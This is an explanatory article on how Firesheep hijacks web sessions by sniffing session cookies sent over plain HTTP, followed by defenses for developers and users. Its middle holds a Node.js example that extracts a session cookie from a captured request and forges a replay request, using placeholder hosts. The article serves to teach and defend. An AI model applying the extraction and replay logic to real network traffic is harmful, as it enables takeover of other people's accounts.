Firesheep lets an attacker on an unencrypted wireless network capture the traffic of other users and take over their sessions on popular websites. With it, the attacker can act inside the victim's accounts on those sites, Facebook being the best-known example. The tool exploits a weakness that has long been known in the industry: insecure session management, specifically session cookies that are sent over plain HTTP. That weakness has still not been fully eliminated.
In this article I describe the mechanism behind web authentication, because it is this mechanism that allows session hijacking to succeed. I then discuss how Firesheep exploits it, and finally the protective measures available to website administrators, website developers, and end users.
Basics of web authentication
1. The user visits a website that requires authentication.
2. The user submits a username and password for verification.
3. The website checks the username and password. If they match, the user is logged in and the server hands the user's browser a cookie. This cookie uniquely identifies the session.
4. The user continues to browse the site. With each request for a new page, the browser sends the cookie along with the request, telling the web server that the request belongs to the session that was authenticated earlier.
In most cases, web developers and website administrators protect step 2 of this process with HTTPS. They know that anyone who can read another user's username and password obtains access to that account trivially. In many cases, however, they then drop back to an unencrypted HTTP connection for the rest of the session, including every exchange of the cookie.
Session hijacking and Firesheep
Now to session hijacking. If an attacker can intercept any of the traffic exchanged in step 4, the cookie is exposed. Once the cookie is known, the eavesdropper can craft an HTTP request that carries it, and the server treats that request as the victim's, granting access to the account without ever seeing a password.
Many well-known websites, including Facebook and other social networks, are vulnerable to this attack. Online banks and some e-commerce sites, by contrast, encrypt all of their traffic. Hijacking a social-networking session may look inconsequential to the average person, but it gives the attacker the same access to the account that the victim has.
Someone who wants to steal sessions connects to an open wireless network, starts Firesheep, and waits for vulnerable users to appear on the screen. When an attractive target shows up, a click on the name is enough to obtain full access to that user's session.
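What the eavesdropper in step 4 actually obtains, as an added example that is not from the original article and is not Firesheep's own code: a small Node.js script that parses one constructed plaintext HTTP request as it would appear in a capture on an open network, looks the host up in a constructed table of session-cookie names (Firesheep ships comparable per-site handlers; the names here are invented), and builds the request the attacker would replay. The host social.example and the cookie name sid are assumptions.

```javascript
// Added example, not from the original article or from Firesheep.
// All hostnames, cookie names and values below are constructed.

// A constructed plaintext HTTP request, as it appears in a packet capture
// when the site serves authenticated pages over http://.
const CAPTURED_REQUEST = [
  "GET /home.php HTTP/1.1",
  "Host: social.example",
  "User-Agent: Mozilla/5.0",
  "Cookie: sid=7f3a9c1e5b2d4e6f; lang=en; theme=dark",
  "",
  "",
].join("\r\n");

// Split a raw HTTP/1.1 request into request line, headers (lower-cased
// names) and body.
function parseRequest(raw) {
  const [head, body = ""] = raw.split("\r\n\r\n");
  const lines = head.split("\r\n");
  const [method, target, version] = lines[0].split(" ");
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i < 0) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, version, headers, body };
}

// Parse a Cookie header (RFC 6265 section 4.2) into a name -> value map.
function parseCookieHeader(value) {
  const jar = {};
  for (const pair of value.split(";")) {
    const i = pair.indexOf("=");
    if (i < 0) continue;
    jar[pair.slice(0, i).trim()] = pair.slice(i + 1).trim();
  }
  return jar;
}

// Constructed table: which cookie names carry the session for which host.
// Firesheep's real per-site handlers play this role; these names are invented.
const SESSION_COOKIE_NAMES = { "social.example": ["sid"] };

// Firesheep-style check: does this captured request leak a session cookie
// for a host we know? Returns the leak, or null if nothing usable is present.
function findLeakedSession(raw) {
  const req = parseRequest(raw);
  const host = req.headers["host"];
  if (!host || !req.headers["cookie"]) return null;
  const jar = parseCookieHeader(req.headers["cookie"]);
  for (const name of SESSION_COOKIE_NAMES[host] || []) {
    if (name in jar) return { host, name, value: jar[name] };
  }
  return null;
}

// The replay: a fresh request to the same host carrying the copied cookie.
// No password is involved; the cookie alone is the proof of the session.
function forgeRequest(leak, path) {
  return [
    `GET ${path} HTTP/1.1`,
    `Host: ${leak.host}`,
    `Cookie: ${leak.name}=${leak.value}`,
    "",
    "",
  ].join("\r\n");
}

const leak = findLeakedSession(CAPTURED_REQUEST);
if (leak) console.log(forgeRequest(leak, "/settings"));
```

The same scanner, pointed at a capture of your own site's traffic, is a cheap audit: any hit means a session cookie still travels in the clear, either because the Secure flag is missing or because an authenticated page is still served over HTTP.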
Defending against session hijacking attacks such as Firesheep
The best defense against Firesheep and other session hijacking attacks lies with web developers and web server administrators. If your web application relies on cookies for session management, make sure the sessions are managed securely. Several methods follow:
1. Send cookies only over SSL/TLS. Set the Secure flag on the session cookie so that the browser transmits it only over HTTPS; a cookie that never travels in the clear cannot be sniffed in transit. This only works if every authenticated page is served over HTTPS, because the browser will not attach a Secure cookie to an http:// request at all.
2. Restrict where the cookie is sent. Scope the cookie as narrowly as possible with the Domain and Path attributes. At minimum, the cookie should go only to hosts in the trusted domain; ideally, omit the Domain attribute so the cookie is sent only to the exact host that set it, and set Path so that it reaches only the application that needs it. Note that Path controls which requests carry the cookie, not which origin's script can read it, so it is housekeeping rather than a security boundary.
3. Keep cookies away from scripts. The HttpOnly flag tells the browser to expose the cookie only in HTTP(S) requests and never to page scripts, which blocks theft of the cookie through JavaScript, for example via cross-site scripting. It does nothing against a network eavesdropper, so it complements the Secure flag rather than replacing it.
If you are an end user, you cannot control how a site configures its cookies, but you can take the following measures:
1. Limit your use of websites that do not offer HTTPS, especially on networks you do not trust.
2. Connect through a VPN. If you are browsing somewhere risky and are worried that an eavesdropper might hijack your session, connect to your workplace VPN (Virtual Private Network) and route your traffic through it, so that it is encrypted between your machine and the VPN gateway. This takes your traffic off the open wireless network, which is where Firesheep listens, although anything the site still sends over plain HTTP remains readable beyond the gateway.
Conclusion
Firesheep is more than a single piece of software. It exposes a structural weakness in how web applications manage sessions. Stopgap measures can limit the short-term damage from tools like it, but the web application community needs to work together on a long-term solution to session hijacking. Otherwise, when the next attack tool appears, we will be just as vulnerable as before.